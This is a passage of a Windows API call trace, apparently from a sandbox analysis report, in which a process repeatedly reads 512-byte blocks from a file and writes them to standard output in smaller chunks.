[0132.623] GetFileType (hFile=0x4c) returned 0x1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] GetFileType (hFile=0x4c) returned 0x1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] GetFileType (hFile=0x4c) returned 0x1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] GetFileType (hFile=0x4c) returned 0x1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.623] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] GetFileType (hFile=0x4c) returned 0x1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] GetFileType (hFile=0x4c) returned 0x1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] GetFileType (hFile=0x4c) returned 0x1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] GetFileType (hFile=0x4c) returned 0x1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] GetFileType (hFile=0x4c) returned 0x1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] GetFileType (hFile=0x4c) returned 0x1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] GetFileType (hFile=0x4c) returned 0x1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] GetFileType (hFile=0x4c) returned 0x1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.624] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] GetFileType (hFile=0x4c) returned 0x1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] GetFileType (hFile=0x4c) returned 0x1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] GetFileType (hFile=0x4c) returned 0x1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] GetFileType (hFile=0x4c) returned 0x1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] GetFileType (hFile=0x4c) returned 0x1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] GetFileType (hFile=0x4c) returned 0x1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] GetFileType (hFile=0x4c) returned 0x1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] GetFileType (hFile=0x4c) returned 0x1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.625] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] GetFileType (hFile=0x4c) returned 0x1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] GetFileType (hFile=0x4c) returned 0x1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] GetFileType (hFile=0x4c) returned 0x1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] GetFileType (hFile=0x4c) returned 0x1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] GetFileType (hFile=0x4c) returned 0x1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] GetFileType (hFile=0x4c) returned 0x1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] GetFileType (hFile=0x4c) returned 0x1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] GetFileType (hFile=0x4c) returned 0x1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.626] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] GetFileType (hFile=0x4c) returned 0x1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] GetFileType (hFile=0x4c) returned 0x1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] GetFileType (hFile=0x4c) returned 0x1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] GetFileType (hFile=0x4c) returned 0x1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] GetFileType (hFile=0x4c) returned 0x1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] GetFileType (hFile=0x4c) returned 0x1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] GetFileType (hFile=0x4c) returned 0x1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] GetFileType (hFile=0x4c) returned 0x1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.627] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] GetFileType (hFile=0x4c) returned 0x1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] GetFileType (hFile=0x4c) returned 0x1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] GetFileType (hFile=0x4c) returned 0x1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] GetFileType (hFile=0x4c) returned 0x1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] GetFileType (hFile=0x4c) returned 0x1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] GetFileType (hFile=0x4c) returned 0x1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] GetFileType (hFile=0x4c) returned 0x1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] GetFileType (hFile=0x4c) returned 0x1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.628] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] GetFileType (hFile=0x4c) returned 0x1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] GetFileType (hFile=0x4c) returned 0x1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] GetFileType (hFile=0x4c) returned 0x1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] GetFileType (hFile=0x4c) returned 0x1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] GetFileType (hFile=0x4c) returned 0x1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] GetFileType (hFile=0x4c) returned 0x1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] GetFileType (hFile=0x4c) returned 0x1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] GetFileType (hFile=0x4c) returned 0x1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.629] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] GetFileType (hFile=0x4c) returned 0x1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] GetFileType (hFile=0x4c) returned 0x1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] GetFileType (hFile=0x4c) returned 0x1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] GetFileType (hFile=0x4c) returned 0x1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] GetFileType (hFile=0x4c) returned 0x1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] GetFileType (hFile=0x4c) returned 0x1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] GetFileType (hFile=0x4c) returned 0x1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, 